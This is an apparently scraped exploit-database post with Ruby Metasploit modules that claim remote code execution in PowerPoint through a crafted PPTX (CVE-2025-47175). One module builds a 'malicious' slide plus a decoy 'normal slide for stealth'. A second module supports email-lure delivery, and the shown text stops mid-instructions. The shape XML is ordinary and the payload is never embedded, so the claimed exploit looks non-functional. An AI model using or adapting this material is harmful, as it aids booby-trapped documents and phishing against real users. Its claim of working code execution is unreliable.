{"id":28306,"date":"2025-12-02T15:33:20","date_gmt":"2025-12-02T15:33:20","guid":{"rendered":"http:\/\/localhost\/?p=28306"},"modified":"2025-12-02T15:33:20","modified_gmt":"2025-12-02T15:33:20","slug":"microsoft-powerpoint-2019-use-after-free","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28306","title":{"rendered":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:42:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The vulnerability is triggered through manipulated shape objects in the PowerPoint&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212315&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-47175&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Microsoft PowerPoint 2019 Use-After-Free Remote Code Execution                                                              |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.microsoft.com\/                                                                                                  |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/206209\/ \\u0026  CVE\u20112025\u201147175\\n    \\n    [+] Summary : This module exploits a Use-After-Free vulnerability in Microsoft PowerPoint\\n                 (CVE-2025-47175) that allows remote code execution when a user opens a\\n                  specially crafted PPTX file. The vulnerability is triggered through\\n                  manipulated shape objects in the PowerPoint presentation.\\n                  \\n    \\t\\t\\t\\n    [+]  POC : \\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = NormalRanking\\n    \\n      include Msf::Exploit::FILEFORMAT\\n      include Msf::Exploit::EXE\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;Microsoft PowerPoint Use-After-Free Remote Code Execution&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits a Use-After-Free vulnerability in Microsoft PowerPoint\\n            (CVE-2025-47175) that allows remote code execution when a user opens a\\n            specially crafted PPTX file. The vulnerability is triggered through\\n            manipulated shape objects in the PowerPoint presentation.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;Mohammed Idrees Banyamer&#8217;, # Original discovery and PoC\\n            &#8216;indoushka&#8217;           # Metasploit module\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2025-47175&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/packetstorm.news\/files\/author\/7697\/1&#8217;],\\n          ],\\n          &#8216;DefaultOptions&#8217; =\\u003e {\\n            &#8216;EXITFUNC&#8217; =\\u003e &#8216;process&#8217;,\\n            &#8216;DisablePayloadHandler&#8217; =\\u003e false\\n          },\\n          &#8216;Platform&#8217;       =\\u003e &#8216;win&#8217;,\\n          &#8216;Arch&#8217;           =\\u003e [ARCH_X86, ARCH_X64],\\n          &#8216;Payload&#8217;        =\\u003e {\\n            &#8216;Space&#8217;       =\\u003e 4096,\\n            &#8216;DisableNops&#8217; =\\u003e true,\\n            &#8216;BadChars&#8217;    =\\u003e &#8221;\\n          },\\n          &#8216;Targets&#8217;        =\\u003e [\\n            [\\n              &#8216;Microsoft PowerPoint 2019 \/ Office 365&#8217;,\\n              {\\n                &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                &#8216;Arch&#8217;     =\\u003e ARCH_X64\\n              }\\n            ],\\n            [\\n              &#8216;Microsoft PowerPoint 2016&#8217;,\\n              {\\n                &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                &#8216;Arch&#8217;     =\\u003e ARCH_X86\\n              }\\n            ]\\n          ],\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-07-02&#8217;,\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0,\\n          &#8216;Notes&#8217;          =\\u003e {\\n            &#8216;Stability&#8217;   =\\u003e [CRASH_SAFE],\\n            &#8216;Reliability&#8217; =\\u003e [FIRST_ATTEMPT_FAIL],\\n            &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]\\n          }))\\n    \\n        register_options([\\n          OptString.new(&#8216;FILENAME&#8217;, [true, &#8216;The PPTX file name&#8217;, &#8216;exploit_cve_2025_47175.pptx&#8217;]),\\n          OptString.new(&#8216;SHAPE_NAME&#8217;, [true, &#8216;Malicious shape name&#8217;, &#8216;MaliciousShape&#8217;]),\\n          OptInt.new(&#8216;SHAPE_ID&#8217;, [true, &#8216;Shape ID for exploitation&#8217;, 1234]),\\n          OptString.new(&#8216;TRIGGER_TEXT&#8217;, [true, &#8216;Text to display in slide&#8217;, &#8216;Important Presentation &#8211; Please Review&#8217;])\\n        ])\\n      end\\n    \\n      def exploit\\n        # Generate the malicious PPTX file\\n        pptx_data = generate_pptx\\n        \\n        file_create(pptx_data)\\n        print_status(\\&#8221;Malicious PPTX file created: #{datastore[&#8216;FILENAME&#8217;]}\\&#8221;)\\n      end\\n    \\n      def generate_pptx\\n        # Create the PPTX structure in memory\\n        pptx = Rex::Zip::Archive.new\\n        \\n        # [Content_Types].xml\\n        content_types = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cTypes xmlns=\\&#8221;http:\/\/schemas.openxmlformats.org\/package\/2006\/content-types\\&#8221;\\u003e\\n      \\u003cDefault Extension=\\&#8221;rels\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-package.relationships+xml\\&#8221;\/\\u003e\\n      \\u003cDefault Extension=\\&#8221;xml\\&#8221; ContentType=\\&#8221;application\/xml\\&#8221;\/\\u003e\\n      \\u003cDefault Extension=\\&#8221;jpeg\\&#8221; ContentType=\\&#8221;image\/jpeg\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/presentation.xml\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/slides\/slide1.xml\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-officedocument.presentationml.slide+xml\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/slides\/slide2.xml\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-officedocument.presentationml.slide+xml\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/slides\/_rels\/slide1.xml.rels\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-package.relationships+xml\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/slides\/_rels\/slide2.xml.rels\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-package.relationships+xml\\&#8221;\/\\u003e\\n      \\u003cOverride PartName=\\&#8221;\/ppt\/_rels\/presentation.xml.rels\\&#8221; ContentType=\\&#8221;application\/vnd.openxmlformats-package.relationships+xml\\&#8221;\/\\u003e\\n    \\u003c\/Types\\u003e|\\n        \\n        pptx.add_file(&#8216;[Content_Types].xml&#8217;, content_types)\\n        \\n        # _rels\/.rels\\n        rels_root = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cRelationships xmlns=\\&#8221;http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\&#8221;\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId1\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/officeDocument\\&#8221; Target=\\&#8221;ppt\/presentation.xml\\&#8221;\/\\u003e\\n    \\u003c\/Relationships\\u003e|\\n        \\n        pptx.add_file(&#8216;_rels\/.rels&#8217;, rels_root)\\n        \\n        # ppt\/presentation.xml\\n        presentation = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cp:presentation xmlns:a=\\&#8221;http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\&#8221;\\n                    xmlns:r=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\&#8221;\\n                    xmlns:p=\\&#8221;http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\&#8221;\\u003e\\n      \\u003cp:sldMasterIdLst\\u003e\\n        \\u003cp:sldMasterId id=\\&#8221;2147483648\\&#8221; r:id=\\&#8221;rId1\\&#8221;\/\\u003e\\n      \\u003c\/p:sldMasterIdLst\\u003e\\n      \\u003cp:sldIdLst\\u003e\\n        \\u003cp:sldId id=\\&#8221;256\\&#8221; r:id=\\&#8221;rId2\\&#8221;\/\\u003e\\n        \\u003cp:sldId id=\\&#8221;257\\&#8221; r:id=\\&#8221;rId3\\&#8221;\/\\u003e\\n      \\u003c\/p:sldIdLst\\u003e\\n      \\u003cp:sldSz cx=\\&#8221;9144000\\&#8221; cy=\\&#8221;6858000\\&#8221; type=\\&#8221;screen4x3\\&#8221;\/\\u003e\\n      \\u003cp:notesSz cx=\\&#8221;6858000\\&#8221; cy=\\&#8221;9144000\\&#8221;\/\\u003e\\n    \\u003c\/p:presentation\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/presentation.xml&#8217;, presentation)\\n        \\n        # ppt\/_rels\/presentation.xml.rels\\n        pres_rels = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cRelationships xmlns=\\&#8221;http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\&#8221;\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId1\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideMaster\\&#8221; Target=\\&#8221;slideMasters\/slideMaster1.xml\\&#8221;\/\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId2\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slide\\&#8221; Target=\\&#8221;slides\/slide1.xml\\&#8221;\/\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId3\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slide\\&#8221; Target=\\&#8221;slides\/slide2.xml\\&#8221;\/\\u003e\\n    \\u003c\/Relationships\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/_rels\/presentation.xml.rels&#8217;, pres_rels)\\n        \\n        # Create malicious slide 1 (trigger slide)\\n        slide1 = generate_malicious_slide\\n        pptx.add_file(&#8216;ppt\/slides\/slide1.xml&#8217;, slide1)\\n        \\n        # Create slide 2 (normal slide for stealth)\\n        slide2 = generate_normal_slide\\n        pptx.add_file(&#8216;ppt\/slides\/slide2.xml&#8217;, slide2)\\n        \\n        # Slide relationships\\n        slide1_rels = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cRelationships xmlns=\\&#8221;http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\&#8221;\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId1\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideLayout\\&#8221; Target=\\&#8221;..\/slideLayouts\/slideLayout1.xml\\&#8221;\/\\u003e\\n    \\u003c\/Relationships\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/slides\/_rels\/slide1.xml.rels&#8217;, slide1_rels)\\n        pptx.add_file(&#8216;ppt\/slides\/_rels\/slide2.xml.rels&#8217;, slide1_rels) # Reuse same rels\\n        \\n        # Slide master and layout (minimal required)\\n        slide_master = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cp:sldMaster xmlns:a=\\&#8221;http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\&#8221;\\n                 xmlns:r=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\&#8221;\\n                 xmlns:p=\\&#8221;http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\&#8221;\\u003e\\n      \\u003cp:cSld\\u003e\\n        \\u003cp:spTree\\u003e\\n          \\u003cp:nvGrpSpPr\\u003e\\n            \\u003cp:cNvPr id=\\&#8221;1\\&#8221; name=\\&#8221;\\&#8221;\/\\u003e\\n            \\u003cp:cNvGrpSpPr\/\\u003e\\n            \\u003cp:nvPr\/\\u003e\\n          \\u003c\/p:nvGrpSpPr\\u003e\\n          \\u003cp:grpSpPr\/\\u003e\\n        \\u003c\/p:spTree\\u003e\\n      \\u003c\/p:cSld\\u003e\\n      \\u003cp:clrMap bg1=\\&#8221;lt1\\&#8221; tx1=\\&#8221;dk1\\&#8221; bg2=\\&#8221;lt2\\&#8221; tx2=\\&#8221;dk2\\&#8221; accent1=\\&#8221;accent1\\&#8221; accent2=\\&#8221;accent2\\&#8221; accent3=\\&#8221;accent3\\&#8221; accent4=\\&#8221;accent4\\&#8221; accent5=\\&#8221;accent5\\&#8221; accent6=\\&#8221;accent6\\&#8221; hlink=\\&#8221;hlink\\&#8221; folHlink=\\&#8221;folHlink\\&#8221;\/\\u003e\\n    \\u003c\/p:sldMaster\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/slideMasters\/slideMaster1.xml&#8217;, slide_master)\\n        \\n        slide_layout = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cp:sldLayout xmlns:a=\\&#8221;http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\&#8221;\\n                 xmlns:r=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\&#8221;\\n                 xmlns:p=\\&#8221;http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\&#8221;\\u003e\\n      \\u003cp:cSld\\u003e\\n        \\u003cp:spTree\\u003e\\n          \\u003cp:nvGrpSpPr\\u003e\\n            \\u003cp:cNvPr id=\\&#8221;1\\&#8221; name=\\&#8221;\\&#8221;\/\\u003e\\n            \\u003cp:cNvGrpSpPr\/\\u003e\\n            \\u003cp:nvPr\/\\u003e\\n          \\u003c\/p:nvGrpSpPr\\u003e\\n          \\u003cp:grpSpPr\/\\u003e\\n        \\u003c\/p:spTree\\u003e\\n      \\u003c\/p:cSld\\u003e\\n      \\u003cp:clrMap bg1=\\&#8221;lt1\\&#8221; tx1=\\&#8221;dk1\\&#8221; bg2=\\&#8221;lt2\\&#8221; tx2=\\&#8221;dk2\\&#8221; accent1=\\&#8221;accent1\\&#8221; accent2=\\&#8221;accent2\\&#8221; accent3=\\&#8221;accent3\\&#8221; accent4=\\&#8221;accent4\\&#8221; accent5=\\&#8221;accent5\\&#8221; accent6=\\&#8221;accent6\\&#8221; hlink=\\&#8221;hlink\\&#8221; folHlink=\\&#8221;folHlink\\&#8221;\/\\u003e\\n    \\u003c\/p:sldLayout\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/slideLayouts\/slideLayout1.xml&#8217;, slide_layout)\\n        \\n        # Add slide master relationships\\n        master_rels = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cRelationships xmlns=\\&#8221;http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\&#8221;\\u003e\\n      \\u003cRelationship Id=\\&#8221;rId1\\&#8221; Type=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideLayout\\&#8221; Target=\\&#8221;..\/slideLayouts\/slideLayout1.xml\\&#8221;\/\\u003e\\n    \\u003c\/Relationships\\u003e|\\n        \\n        pptx.add_file(&#8216;ppt\/slideMasters\/_rels\/slideMaster1.xml.rels&#8217;, master_rels)\\n        \\n        # Return the complete PPTX file\\n        return pptx.pack\\n      end\\n    \\n      def generate_malicious_slide\\n        shape_id = datastore[&#8216;SHAPE_ID&#8217;]\\n        shape_name = datastore[&#8216;SHAPE_NAME&#8217;]\\n        trigger_text = datastore[&#8216;TRIGGER_TEXT&#8217;]\\n        \\n        # Create the malicious slide with UAF trigger\\n        slide_xml = %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cp:sld xmlns:a=\\&#8221;http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\&#8221;\\n           xmlns:r=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\&#8221;\\n           xmlns:p=\\&#8221;http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\&#8221;\\u003e\\n      \\u003cp:cSld\\u003e\\n        \\u003cp:spTree\\u003e\\n          \\u003c!&#8211; Malicious shape designed to trigger UAF &#8211;\\u003e\\n          \\u003cp:sp\\u003e\\n            \\u003cp:nvSpPr\\u003e\\n              \\u003cp:cNvPr id=\\&#8221;#{shape_id}\\&#8221; name=\\&#8221;#{shape_name}\\&#8221;\/\\u003e\\n              \\u003cp:cNvSpPr\\u003e\\n                \\u003ca:spLocks noGrp=\\&#8221;1\\&#8221; noRot=\\&#8221;1\\&#8221; noChangeAspect=\\&#8221;1\\&#8221;\/\\u003e\\n              \\u003c\/p:cNvSpPr\\u003e\\n              \\u003cp:nvPr\\u003e\\n                \\u003cp:ph type=\\&#8221;title\\&#8221;\/\\u003e\\n              \\u003c\/p:nvPr\\u003e\\n            \\u003c\/p:nvSpPr\\u003e\\n            \\u003cp:spPr\\u003e\\n              \\u003ca:xfrm\\u003e\\n                \\u003ca:off x=\\&#8221;914400\\&#8221; y=\\&#8221;914400\\&#8221;\/\\u003e\\n                \\u003ca:ext cx=\\&#8221;7315200\\&#8221; cy=\\&#8221;1371600\\&#8221;\/\\u003e\\n              \\u003c\/a:xfrm\\u003e\\n              \\u003ca:prstGeom prst=\\&#8221;rect\\&#8221;\\u003e\\n                \\u003ca:avLst\/\\u003e\\n              \\u003c\/a:prstGeom\\u003e\\n              \\u003ca:solidFill\\u003e\\n                \\u003ca:srgbClr val=\\&#8221;4472C4\\&#8221;\/\\u003e\\n              \\u003c\/a:solidFill\\u003e\\n              \\u003ca:ln w=\\&#8221;9525\\&#8221;\\u003e\\n                \\u003ca:solidFill\\u003e\\n                  \\u003ca:srgbClr val=\\&#8221;000000\\&#8221;\/\\u003e\\n                \\u003c\/a:solidFill\\u003e\\n              \\u003c\/a:ln\\u003e\\n            \\u003c\/p:spPr\\u003e\\n            \\u003cp:txBody\\u003e\\n              \\u003ca:bodyPr rtlCol=\\&#8221;0\\&#8221; anchor=\\&#8221;ctr\\&#8221;\/\\u003e\\n              \\u003ca:lstStyle\/\\u003e\\n              \\u003ca:p\\u003e\\n                \\u003ca:pPr algn=\\&#8221;ctr\\&#8221;\/\\u003e\\n                \\u003ca:r\\u003e\\n                  \\u003ca:rPr lang=\\&#8221;en-US\\&#8221; sz=\\&#8221;4400\\&#8221; b=\\&#8221;1\\&#8221;\\u003e\\n                    \\u003ca:solidFill\\u003e\\n                      \\u003ca:srgbClr val=\\&#8221;FFFFFF\\&#8221;\/\\u003e\\n                    \\u003c\/a:solidFill\\u003e\\n                  \\u003c\/a:rPr\\u003e\\n                  \\u003ca:t\\u003e#{trigger_text}\\u003c\/a:t\\u003e\\n                \\u003c\/a:r\\u003e\\n              \\u003c\/a:p\\u003e\\n            \\u003c\/p:txBody\\u003e\\n          \\u003c\/p:sp\\u003e\\n          \\n          \\u003c!&#8211; Additional shapes to increase exploitation reliability &#8211;\\u003e\\n          \\u003cp:sp\\u003e\\n            \\u003cp:nvSpPr\\u003e\\n              \\u003cp:cNvPr id=\\&#8221;#{shape_id + 1}\\&#8221; name=\\&#8221;#{shape_name}_2\\&#8221;\/\\u003e\\n              \\u003cp:cNvSpPr\/\\u003e\\n              \\u003cp:nvPr\/\\u003e\\n            \\u003c\/p:nvSpPr\\u003e\\n            \\u003cp:spPr\\u003e\\n              \\u003ca:xfrm\\u003e\\n                \\u003ca:off x=\\&#8221;1524000\\&#8221; y=\\&#8221;3048000\\&#8221;\/\\u003e\\n                \\u003ca:ext cx=\\&#8221;1828800\\&#8221; cy=\\&#8221;1828800\\&#8221;\/\\u003e\\n              \\u003c\/a:xfrm\\u003e\\n              \\u003ca:prstGeom prst=\\&#8221;rect\\&#8221;\\u003e\\n                \\u003ca:avLst\/\\u003e\\n              \\u003c\/a:prstGeom\\u003e\\n            \\u003c\/p:spPr\\u003e\\n            \\u003cp:txBody\\u003e\\n              \\u003ca:bodyPr\/\\u003e\\n              \\u003ca:lstStyle\/\\u003e\\n              \\u003ca:p\\u003e\\n                \\u003ca:r\\u003e\\n                  \\u003ca:t\\u003eAdditional Content\\u003c\/a:t\\u003e\\n                \\u003c\/a:r\\u003e\\n              \\u003c\/a:p\\u003e\\n            \\u003c\/p:txBody\\u003e\\n          \\u003c\/p:sp\\u003e\\n          \\n          \\u003c!&#8211; Trigger shape with crafted properties &#8211;\\u003e\\n          \\u003cp:sp\\u003e\\n            \\u003cp:nvSpPr\\u003e\\n              \\u003cp:cNvPr id=\\&#8221;#{shape_id + 2}\\&#8221; name=\\&#8221;TriggerShape\\&#8221;\/\\u003e\\n              \\u003cp:cNvSpPr\\u003e\\n                \\u003ca:spLocks noGrp=\\&#8221;1\\&#8221;\/\\u003e\\n              \\u003c\/p:cNvSpPr\\u003e\\n              \\u003cp:nvPr\/\\u003e\\n            \\u003c\/p:nvSpPr\\u003e\\n            \\u003cp:spPr\\u003e\\n              \\u003ca:xfrm\\u003e\\n                \\u003ca:off x=\\&#8221;3048000\\&#8221; y=\\&#8221;4572000\\&#8221;\/\\u003e\\n                \\u003ca:ext cx=\\&#8221;1828800\\&#8221; cy=\\&#8221;1828800\\&#8221;\/\\u003e\\n              \\u003c\/a:xfrm\\u003e\\n              \\u003ca:prstGeom prst=\\&#8221;roundRect\\&#8221;\\u003e\\n                \\u003ca:avLst\/\\u003e\\n              \\u003c\/a:prstGeom\\u003e\\n              \\u003ca:gradFill rot=\\&#8221;0\\&#8221;\\u003e\\n                \\u003ca:gsLst\\u003e\\n                  \\u003ca:gs pos=\\&#8221;0\\&#8221;\\u003e\\n                    \\u003ca:srgbClr val=\\&#8221;5B9BD5\\&#8221;\/\\u003e\\n                  \\u003c\/a:gs\\u003e\\n                  \\u003ca:gs pos=\\&#8221;100000\\&#8221;\\u003e\\n                    \\u003ca:srgbClr val=\\&#8221;2E75B5\\&#8221;\/\\u003e\\n                  \\u003c\/a:gs\\u003e\\n                \\u003c\/a:gsLst\\u003e\\n              \\u003c\/a:gradFill\\u003e\\n            \\u003c\/p:spPr\\u003e\\n            \\u003cp:txBody\\u003e\\n              \\u003ca:bodyPr wrap=\\&#8221;square\\&#8221; rtlCol=\\&#8221;0\\&#8221;\\u003e\\n                \\u003ca:spAutoFit\/\\u003e\\n              \\u003c\/a:bodyPr\\u003e\\n              \\u003ca:lstStyle\/\\u003e\\n              \\u003ca:p\\u003e\\n                \\u003ca:r\\u003e\\n                  \\u003ca:rPr lang=\\&#8221;en-US\\&#8221; sz=\\&#8221;1800\\&#8221;\/\\u003e\\n                  \\u003ca:t\\u003eClick to continue\\u003c\/a:t\\u003e\\n                \\u003c\/a:r\\u003e\\n              \\u003c\/a:p\\u003e\\n            \\u003c\/p:txBody\\u003e\\n          \\u003c\/p:sp\\u003e\\n        \\u003c\/p:spTree\\u003e\\n      \\u003c\/p:cSld\\u003e\\n      \\u003cp:clrMapOvr\\u003e\\n        \\u003ca:masterClrMapping\/\\u003e\\n      \\u003c\/p:clrMapOvr\\u003e\\n    \\u003c\/p:sld\\u003e|\\n        \\n        return slide_xml\\n      end\\n    \\n      def generate_normal_slide\\n        # Create a normal-looking second slide for stealth\\n        %Q|\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221; standalone=\\&#8221;yes\\&#8221;?\\u003e\\n    \\u003cp:sld xmlns:a=\\&#8221;http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\&#8221;\\n           xmlns:r=\\&#8221;http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\&#8221;\\n           xmlns:p=\\&#8221;http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\&#8221;\\u003e\\n      \\u003cp:cSld\\u003e\\n        \\u003cp:spTree\\u003e\\n          \\u003cp:sp\\u003e\\n            \\u003cp:nvSpPr\\u003e\\n              \\u003cp:cNvPr id=\\&#8221;2\\&#8221; name=\\&#8221;Title 1\\&#8221;\/\\u003e\\n              \\u003cp:cNvSpPr\\u003e\\n                \\u003ca:spLocks noGrp=\\&#8221;1\\&#8221;\/\\u003e\\n              \\u003c\/p:cNvSpPr\\u003e\\n              \\u003cp:nvPr\\u003e\\n                \\u003cp:ph type=\\&#8221;title\\&#8221;\/\\u003e\\n              \\u003c\/p:nvPr\\u003e\\n            \\u003c\/p:nvSpPr\\u003e\\n            \\u003cp:spPr\/\\u003e\\n            \\u003cp:txBody\\u003e\\n              \\u003ca:bodyPr\/\\u003e\\n              \\u003ca:lstStyle\/\\u003e\\n              \\u003ca:p\\u003e\\n                \\u003ca:r\\u003e\\n                  \\u003ca:rPr lang=\\&#8221;en-US\\&#8221;\/\\u003e\\n                  \\u003ca:t\\u003eNormal Slide Content\\u003c\/a:t\\u003e\\n                \\u003c\/a:r\\u003e\\n              \\u003c\/a:p\\u003e\\n            \\u003c\/p:txBody\\u003e\\n          \\u003c\/p:sp\\u003e\\n        \\u003c\/p:spTree\\u003e\\n      \\u003c\/p:cSld\\u003e\\n      \\u003cp:clrMapOvr\\u003e\\n        \\u003ca:masterClrMapping\/\\u003e\\n      \\u003c\/p:clrMapOvr\\u003e\\n    \\u003c\/p:sld\\u003e|\\n      end\\n    end\\n    \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    Auxiliary Module for Payload Delivery\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    ##\\n    # Auxiliary module for CVE-2025-47175 payload delivery\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;CVE-2025-47175 PowerPoint Exploit Delivery&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module assists in delivering the CVE-2025-47175 PowerPoint exploit\\n            through various social engineering vectors.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [&#8216;indoushka&#8217;],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [[&#8216;CVE&#8217;, &#8216;2025-47175&#8217;]]\\n        ))\\n    \\n        register_options([\\n          OptString.new(&#8216;EMAIL_SUBJECT&#8217;, [true, &#8216;Email subject for delivery&#8217;, &#8216;Important Presentation&#8217;]),\\n          OptString.new(&#8216;EMAIL_BODY&#8217;, [true, &#8216;Email body text&#8217;, &#8216;Please review the attached presentation.&#8217;]),\\n          OptPath.new(&#8216;PPTX_FILE&#8217;, [true, &#8216;Path to malicious PPTX file&#8217;])\\n        ])\\n      end\\n    \\n      def run\\n        pptx_path = datastore[&#8216;PPTX_FILE&#8217;]\\n        \\n        unless File.exist?(pptx_path)\\n          print_error(\\&#8221;PPTX file not found: #{pptx_path}\\&#8221;)\\n          return\\n        end\\n    \\n        print_status(\\&#8221;CVE-2025-47175 PowerPoint Exploit Delivery\\&#8221;)\\n        print_status(\\&#8221;Malicious file: #{pptx_path}\\&#8221;)\\n        print_status(\\&#8221;File size: #{File.size(pptx_path)} bytes\\&#8221;)\\n        \\n        # Display delivery instructions\\n        show_delivery_instructions\\n      end\\n    \\n      def show_delivery_instructions\\n        print_line(\\&#8221;\\n    \ud83d\udce7 Delivery Methods:\\n    